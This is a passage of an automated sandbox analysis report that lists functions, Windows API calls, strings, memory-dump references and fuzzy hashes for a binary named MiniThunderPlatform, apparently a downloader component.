                                                                                                                                              • ?rfind@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIDI@Z.MSVCP71(0000005C,7C3F18B8), ref: 1002C710
                                                                                                                                              • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP71(?,00000000,00000000), ref: 1002C729
                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 1002C74C
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1002C757
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$CreateDirectory$??1?$basic_string@?rfind@?$basic_string@?substr@?$basic_string@AttributesFileH_prologV12@
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2536239797-0
                                                                                                                                              • Opcode ID: 3dd612f9cf95638cd22fb9f20b1ed805162a56420a6c1ce05fb51400f5601352
                                                                                                                                              • Instruction ID: a26d0f60ee3a882a43987d35ab17004edb4067f4c76853ab56991f4d02492fe5
                                                                                                                                              • Opcode Fuzzy Hash: 3dd612f9cf95638cd22fb9f20b1ed805162a56420a6c1ce05fb51400f5601352
                                                                                                                                              • Instruction Fuzzy Hash: 99217135A04619DBDB24DBF9ED88F6EB3B8FB09B50FA00559E802E7191D770A944CB60
                                                                                                                                              Function 1007A810 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 146COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(map/set<T> too long), ref: 1007A83D
                                                                                                                                              • ??0exception@@QAE@XZ.MSVCR71 ref: 1007A84F
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 1007A86B
                                                                                                                                              • _CxxThrowException.MSVCR71(102768C4,102B1FC0), ref: 1007A888
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??0?$basic_string@D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0exception@@ExceptionThrowV01@@
                                                                                                                                              • String ID: map/set<T> too long
                                                                                                                                              • API String ID: 113201077-1285458680
                                                                                                                                              • Opcode ID: 51b84e71d0ad33ac52ca20f461d6ff2f67ba1ec9584dac69b699d8cf21095ab6
                                                                                                                                              • Instruction ID: 2133f4f83fe0ad578e3c9e72c85df08b23d6564c46cfcc340a3f8b448b81a77b
                                                                                                                                              • Opcode Fuzzy Hash: 51b84e71d0ad33ac52ca20f461d6ff2f67ba1ec9584dac69b699d8cf21095ab6
                                                                                                                                              • Instruction Fuzzy Hash: 76516674608281DFC314DB48C184A5AFBE5FB8A300F15C68DE49A4B752C735EC82CB96
                                                                                                                                              Function 00430700 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 82COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML; ; NW; ; ; LW),00000001,00000000,00000000), ref: 00430754
                                                                                                                                              • GetSecurityDescriptorSacl.ADVAPI32(00000000,00000000,00000000,00000000), ref: 00430777
                                                                                                                                              • SetSecurityInfo.ADVAPI32(?,00000006,00000010,00000000,00000000,00000000,00000000), ref: 0043079C
                                                                                                                                              • LocalFree.KERNEL32(00000000), ref: 004307BE
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1614044465.0000000000417000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1614008254.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1614044465.0000000000448000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1614044465.0000000000456000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1614158449.000000000045A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1614181616.000000000045C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Security$Descriptor$ConvertFreeInfoLocalSaclString
                                                                                                                                              • String ID: S:(ML; ; NW; ; ; LW)
                                                                                                                                              • API String ID: 3116297227-162786968
                                                                                                                                              • Opcode ID: 4ea4d0f726bf1ce49346053cf0fa79e0647b5d18921065ccb85639a29cb567a3
                                                                                                                                              • Instruction ID: 806c27dcb079aa362a95d46c213dbad28f5a2269f2e1a005252a139f1f1fb685
                                                                                                                                              • Opcode Fuzzy Hash: 4ea4d0f726bf1ce49346053cf0fa79e0647b5d18921065ccb85639a29cb567a3
                                                                                                                                              • Instruction Fuzzy Hash: 5A219772A003086BEB10EBA9DC46FDEBB799B08354F014119F944B7281DBB99D48C7E5
                                                                                                                                              Function 10049270 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73networkCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 10048B40: socket.WS2_32(00000002,00000001,00000006), ref: 10048B62
                                                                                                                                                • Part of subcall function 10048B40: WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,?,00000000,10244469,000000FF,10049292,?), ref: 10048B6F
                                                                                                                                                • Part of subcall function 10048B40: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(create socket object error,?,?,?,?,?,?,?,?,?,?,?,00000000,10244469,000000FF,10049292), ref: 10048B80
                                                                                                                                                • Part of subcall function 10048B40: _CxxThrowException.MSVCR71(?,102B9B68), ref: 10048BA7
                                                                                                                                                • Part of subcall function 10048B40: setsockopt.WS2_32(00000000,0000FFFF,00001002,?,00000004), ref: 10048BC4
                                                                                                                                                • Part of subcall function 100258AC: malloc.MSVCR71(100104C9,?,100104C9,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 100258C5
                                                                                                                                              • AcceptEx.MSWSOCK(?,00000000,000000FF,00000000,00000020,00000020,?,?), ref: 100492F5
                                                                                                                                              • WSAGetLastError.WS2_32(?,00000000,000000FF,00000000,00000020,00000020,?,?,00000000,00000000), ref: 100492FF
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(asyn accept request error), ref: 1004931F
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B9B68,?,00000000), ref: 10049346
                                                                                                                                                • Part of subcall function 10049060: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(set_recv_buffer,00000000,?,?,?,?,?,?,?,?,?,?,00000000,102444DC,000000FF,10031963), ref: 100490B8
                                                                                                                                                • Part of subcall function 10049060: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71 ref: 100490CC
                                                                                                                                                • Part of subcall function 10049060: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,00000000), ref: 100490FE
                                                                                                                                                • Part of subcall function 10049060: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1004910C
                                                                                                                                                • Part of subcall function 10049060: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(recv_buffer_size), ref: 1004911B
                                                                                                                                                • Part of subcall function 10049060: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(socket), ref: 1004912F
                                                                                                                                                • Part of subcall function 10049060: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,00002000), ref: 10049160
                                                                                                                                                • Part of subcall function 10049060: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1004916E
                                                                                                                                              Strings
                                                                                                                                              • asyn accept request error, xrefs: 1004930F
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@$??1?$basic_string@$ErrorExceptionLastThrow$Acceptmallocsetsockoptsocket
                                                                                                                                              • String ID: asyn accept request error
                                                                                                                                              • API String ID: 2712593612-1481883526
                                                                                                                                              • Opcode ID: f25813f6ef4f72ee42533756c7d52fa9c957962192d9ac83d0b42544a2d997cf
                                                                                                                                              • Instruction ID: 28dd36bffd8cec8ff3f7b0d70ea96f64b9df0113ddf2c0cdf5e23cf28b5c88bb
                                                                                                                                              • Opcode Fuzzy Hash: f25813f6ef4f72ee42533756c7d52fa9c957962192d9ac83d0b42544a2d997cf
                                                                                                                                              • Instruction Fuzzy Hash: 8121BD76104740AFD310DB68C845B9BBBE8EB99710F104A2DF196C7281DBB5F444CBA6
                                                                                                                                              Function 10075A76 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 72COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 10075A7B
                                                                                                                                              • __RTDynamicCast.MSVCR71(?,00000000,103008C4,103008E4,00000000), ref: 10075A99
                                                                                                                                                • Part of subcall function 10075B3E: __EH_prolog.LIBCMT ref: 10075B43
                                                                                                                                                • Part of subcall function 100261B0: __EH_prolog.LIBCMT ref: 100261B5
                                                                                                                                                • Part of subcall function 100261B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?,?,?), ref: 100261DE
                                                                                                                                                • Part of subcall function 100261B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000,?,?), ref: 1002620C
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 10026226
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 1002623C
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?), ref: 1002625A
                                                                                                                                              Strings
                                                                                                                                              • _command_ptr == NULL, xrefs: 10075AD5
                                                                                                                                              • d:\minidownloadlib\branches\branch_wbf\p2sp\sim_class\../com_class/CCommand.h, xrefs: 10075ACB
                                                                                                                                              • thunder_assert, xrefs: 10075AD0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@H_prolog$??0?$basic_string@$CastDynamicV01@@
                                                                                                                                              • String ID: _command_ptr == NULL$d:\minidownloadlib\branches\branch_wbf\p2sp\sim_class\../com_class/CCommand.h$thunder_assert
                                                                                                                                              • API String ID: 476892423-1935395585
                                                                                                                                              • Opcode ID: ac84a777fd3cd90378c4143a49ec8e10b0b7c8ffe06f880b94d4dc1718de725d
                                                                                                                                              • Instruction ID: a85ada515a0dcf320d7d5773c998043fe25d83dd517fbb7c322e9a5ce5b46182
                                                                                                                                              • Opcode Fuzzy Hash: ac84a777fd3cd90378c4143a49ec8e10b0b7c8ffe06f880b94d4dc1718de725d
                                                                                                                                              • Instruction Fuzzy Hash: F02158B5900209BFDB04CFA8CC85DEEBBB8FF49255B50856AF445AB201D775AA508BA0
                                                                                                                                              Function 1003CCA0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 69COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • RtlEnterCriticalSection.NTDLL(?), ref: 1003CCC8
                                                                                                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 1003CD62
                                                                                                                                                • Part of subcall function 100261B0: __EH_prolog.LIBCMT ref: 100261B5
                                                                                                                                                • Part of subcall function 100261B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?,?,?), ref: 100261DE
                                                                                                                                                • Part of subcall function 100261B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000,?,?), ref: 1002620C
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 10026226
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 1002623C
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?), ref: 1002625A
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$??0?$basic_string@CriticalSection$EnterH_prologLeaveV01@@
                                                                                                                                              • String ID: .\connect_manager.cpp$NULL$thunder_assert
                                                                                                                                              • API String ID: 673916969-3610350842
                                                                                                                                              • Opcode ID: c11f24da378c2cc8eb44d0107a4f1b0041c6c2db9741742b87a4206d3752ba99
                                                                                                                                              • Instruction ID: 58616e4f0a636c71466ab6161333ef8701ef86065cc541bb134d706d06b2b1a9
                                                                                                                                              • Opcode Fuzzy Hash: c11f24da378c2cc8eb44d0107a4f1b0041c6c2db9741742b87a4206d3752ba99
                                                                                                                                              • Instruction Fuzzy Hash: 072101712086059FC315DB29C844F6BB7E8FB88711F008A1DF159D7282DB30E908CBA2
                                                                                                                                              Function 1003D1D0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 66COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??_V@YAXPAX@Z.MSVCR71(?,?,?,?,?,?,10243168,000000FF), ref: 1003D233
                                                                                                                                              • ??3@YAXPAX@Z.MSVCR71(?,?,?,?,?,?,10243168,000000FF), ref: 1003D26B
                                                                                                                                                • Part of subcall function 100261B0: __EH_prolog.LIBCMT ref: 100261B5
                                                                                                                                                • Part of subcall function 100261B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?,?,?), ref: 100261DE
                                                                                                                                                • Part of subcall function 100261B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000,?,?), ref: 1002620C
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 10026226
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 1002623C
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?), ref: 1002625A
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$??0?$basic_string@$??3@H_prologV01@@
                                                                                                                                              • String ID: .\asyn_io_operation.cpp$_is_pending == false$thunder_assert
                                                                                                                                              • API String ID: 1027865869-2628544267
                                                                                                                                              • Opcode ID: ffd39030ab3b6ecff099ec77e66dd263ab7e425f74e998bc83e56838a05d6183
                                                                                                                                              • Instruction ID: 3434f459787ec4a3718c21f3035fffabf924ca31e194fbc8b92f19f6ce1d9bcf
                                                                                                                                              • Opcode Fuzzy Hash: ffd39030ab3b6ecff099ec77e66dd263ab7e425f74e998bc83e56838a05d6183
                                                                                                                                              • Instruction Fuzzy Hash: B42177B5900B909FC320DF69D8C1B57B7E5FB59601F90892EE1AA8BB01C731A840CB41
                                                                                                                                              Function 1002BE90 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,?,0000001C,00000400), ref: 1002BEBF
                                                                                                                                              • GetLastError.KERNEL32(00000000), ref: 1002BECA
                                                                                                                                                • Part of subcall function 1000F130: _ultoa.MSVCR71 ref: 1000F157
                                                                                                                                                • Part of subcall function 1000F130: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?), ref: 1000F167
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71 ref: 1002BEF4
                                                                                                                                                • Part of subcall function 100013D0: __EH_prolog.LIBCMT ref: 100013D5
                                                                                                                                                • Part of subcall function 100013D0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 100013E8
                                                                                                                                                • Part of subcall function 100013D0: ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000), ref: 100013F9
                                                                                                                                                • Part of subcall function 100013D0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000), ref: 10001403
                                                                                                                                                • Part of subcall function 100013D0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10001413
                                                                                                                                                • Part of subcall function 1002BD70: ??0exception@@QAE@XZ.MSVCR71(?,?,00000000,102423C9,000000FF,1021B19D,00000000,?,10056267), ref: 1002BD8D
                                                                                                                                                • Part of subcall function 1002BD70: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 1002BDA9
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B6AA0), ref: 1002BF2D
                                                                                                                                              Strings
                                                                                                                                              • MultiByteToWideChar call error, code:, xrefs: 1002BEE0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@$V01@@$??0exception@@??1?$basic_string@?append@?$basic_string@ByteCharErrorExceptionH_prologLastMultiThrowV12@V12@@Wide_ultoa
                                                                                                                                              • String ID: MultiByteToWideChar call error, code:
                                                                                                                                              • API String ID: 1327079663-1807614933
                                                                                                                                              • Opcode ID: a8547673f1edf53a9de9de323fb27821e47e7ace949cd87b1d97b0f32b5c63a4
                                                                                                                                              • Instruction ID: c4583ca8e1ab2907b00e94455e5570a208bec0cde5891ee654c99e23bad82e56
                                                                                                                                              • Opcode Fuzzy Hash: a8547673f1edf53a9de9de323fb27821e47e7ace949cd87b1d97b0f32b5c63a4
                                                                                                                                              • Instruction Fuzzy Hash: 9711A076004240AFD321DB64DC49F9BB7E8EB49744F50860DF54992281DB39A505CFA2
                                                                                                                                              Function 10054AC0 Relevance: 7.7, APIs: 5, Instructions: 157COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • recvfrom.WS2_32 ref: 10054B17
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?,?), ref: 10054C7E
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10054CA6
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??1?$basic_string@D@2@@std@@D@std@@U?$char_traits@V?$allocator@$recvfrom
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3099163178-0
                                                                                                                                              • Opcode ID: 946ecd4118c77ea64eb9d0e77f296acbe555a52c1e4e070431b111d63e351533
                                                                                                                                              • Instruction ID: 99efc3247266f9d69c84a33fe0b086f68eee5af7d351097b9c8c80ba55cde981
                                                                                                                                              • Opcode Fuzzy Hash: 946ecd4118c77ea64eb9d0e77f296acbe555a52c1e4e070431b111d63e351533
                                                                                                                                              • Instruction Fuzzy Hash: 4E6157751083819ED324DFA4C885BEEBBE8EFD9254F404A1DF5DA42282DF70A548CB63
                                                                                                                                              Function 00422BC0 Relevance: 7.6, APIs: 5, Instructions: 112fileCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • UnmapViewOfFile.KERNEL32(00000000), ref: 00422C56
                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00422C7F
                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00422CA8
                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00422CD1
                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00422CFA
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1614044465.0000000000417000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1614008254.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1614044465.0000000000448000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1614044465.0000000000456000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1614158449.000000000045A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1614181616.000000000045C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
